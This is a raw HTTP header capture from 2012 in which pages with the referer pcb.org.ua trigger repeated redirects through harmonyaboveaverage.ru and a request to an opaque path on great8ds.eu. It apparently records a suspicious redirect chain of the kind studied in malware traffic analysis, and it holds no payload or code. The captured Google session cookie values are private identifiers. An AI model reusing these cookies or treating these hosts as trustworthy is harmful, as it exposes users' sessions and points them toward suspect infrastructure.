Content-Type: text/html; charset=windows-1251
Server: nginx/1.2.3
Date: Sat, 10 Nov 2012 02:39:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Language: windows-1251
GET /modelerdeclare.cgi?8 HTTP/1.1

Host: harmonyaboveaverage.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 23:32:06 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Sat, 10-Nov-2012 23:32:06 GMT; path=/; domain=harmonyaboveaverage.ru
Location: http://www.google.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET /16123a/4e652cd044a456bee467d7151e3857ec HTTP/1.1

Host: great8ds.eu

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 200 OK

Content-Type: text/html; charset=windows-1251
Server: nginx/1.2.3
Date: Sat, 10 Nov 2012 02:39:03 GMT
Content-Length: 48
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Content-Language: windows-1251
GET / HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://www.google.no/
Cache-Control: private
Set-Cookie: NID=64=J1eSdFjytAeuc7ng-GzOQym9nBV3feJLUhIHcSkWeX2pmQkgEgfZh3L57MoA0H8uHvgYoR_u70xhR7d63p6MGyA67krY6bYM_PG5BVeFh_-DSRPm8_Xa4llSRlqiMmiS; expires=Sat, 11-May-2013 23:29:36 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP=&quot;This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&amp;answer=151657 for more info.&quot;
Date: Fri, 09 Nov 2012 23:29:36 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET /modelerdeclare.cgi?8 HTTP/1.1

Host: harmonyaboveaverage.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 23:32:06 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Sat, 10-Nov-2012 23:32:06 GMT; path=/; domain=harmonyaboveaverage.ru
Location: http://www.google.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET /hit?t54.6;r;s1176*885*24;uhttp%3A//pcb.org.ua/;0.5416091196104842 HTTP/1.1

Host: counter.yadro.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Date: Fri, 09 Nov 2012 23:29:36 GMT
Server: 0W/0.8c
Location: http://counter.yadro.ru/hit?q;t54.6;r;s1176*885*24;uhttp%3A//pcb.org.ua/;0.5416091196104842
Content-Length: 32
Expires: Thu, 10 Nov 2011 20:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;UNI&quot;
Set-Cookie: FTID=1GdP7W3HHRX2; path=/; expires=Sat, 09 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET / HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=J1eSdFjytAeuc7ng-GzOQym9nBV3feJLUhIHcSkWeX2pmQkgEgfZh3L57MoA0H8uHvgYoR_u70xhR7d63p6MGyA67krY6bYM_PG5BVeFh_-DSRPm8_Xa4llSRlqiMmiS
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://www.google.no/
Cache-Control: private
Date: Fri, 09 Nov 2012 23:29:36 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET /hit?q;t54.6;r;s1176*885*24;uhttp%3A//pcb.org.ua/;0.5416091196104842 HTTP/1.1

Host: counter.yadro.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: FTID=1GdP7W3HHRX2
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 09 Nov 2012 23:29:36 GMT
Server: 0W/0.8c
Connection: Close
Content-Length: 422
Expires: Thu, 10 Nov 2011 20:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;UNI&quot;
Set-Cookie: VID=3RrVA10LamH2; path=/; expires=Sat, 09 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /modelerdeclare.cgi?8 HTTP/1.1

Host: harmonyaboveaverage.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 23:32:07 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Sat, 10-Nov-2012 23:32:07 GMT; path=/; domain=harmonyaboveaverage.ru
Location: http://www.google.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET / HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=J1eSdFjytAeuc7ng-GzOQym9nBV3feJLUhIHcSkWeX2pmQkgEgfZh3L57MoA0H8uHvgYoR_u70xhR7d63p6MGyA67krY6bYM_PG5BVeFh_-DSRPm8_Xa4llSRlqiMmiS
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://www.google.no/
Cache-Control: private
Date: Fri, 09 Nov 2012 23:29:36 GMT
Server: gws
Content-Length: 218
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET /favicon.ico HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:36 GMT
Connection: keep-alive
Content-Length: 328
GET /favicon.ico HTTP/1.1

Host: pcb.org.ua

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 308c67277fcaf6aeb8c0c78b11c1a140=a0f183d81c465980f14d663f24c37cd1
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Server: nginx/1.0.0
Date: Fri, 09 Nov 2012 23:29:38 GMT
Connection: keep-alive
Content-Length: 328
GET / HTTP/1.1

Host: www.google.no

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=833f642268853dd7:U=b8513c9986712345:FF=0:TM=1350344350:LM=1350344355:S=LPv_BMBUAC2Sq6lO; NID=64=wjqq-34sbw8_xZ_YRV2WYW7fIZaBTx0lz0gBHcLIwqanxYn4oQAq91WrZ2VCsF5Rw54OTpvDvPxDz0V1G-U8l77CmHDtBoxYEO7q4xasLAaD13EdvlmdnYljh62qP_E8
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 09 Nov 2012 23:29:36 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1

Host: www.google.no

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=833f642268853dd7:U=b8513c9986712345:FF=0:TM=1350344350:LM=1350344355:S=LPv_BMBUAC2Sq6lO; NID=64=wjqq-34sbw8_xZ_YRV2WYW7fIZaBTx0lz0gBHcLIwqanxYn4oQAq91WrZ2VCsF5Rw54OTpvDvPxDz0V1G-U8l77CmHDtBoxYEO7q4xasLAaD13EdvlmdnYljh62qP_E8
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 09 Nov 2012 23:29:36 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
GET / HTTP/1.1

Host: www.google.no

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pcb.org.ua/
Cookie: PREF=ID=833f642268853dd7:U=b8513c9986712345:FF=0:TM=1350344350:LM=1350344355:S=LPv_BMBUAC2Sq6lO; NID=64=wjqq-34sbw8_xZ_YRV2WYW7fIZaBTx0lz0gBHcLIwqanxYn4oQAq91WrZ2VCsF5Rw54OTpvDvPxDz0V1G-U8l77CmHDtBoxYEO7q4xasLAaD13EdvlmdnYljh62qP_E8
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 09 Nov 2012 23:29:36 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN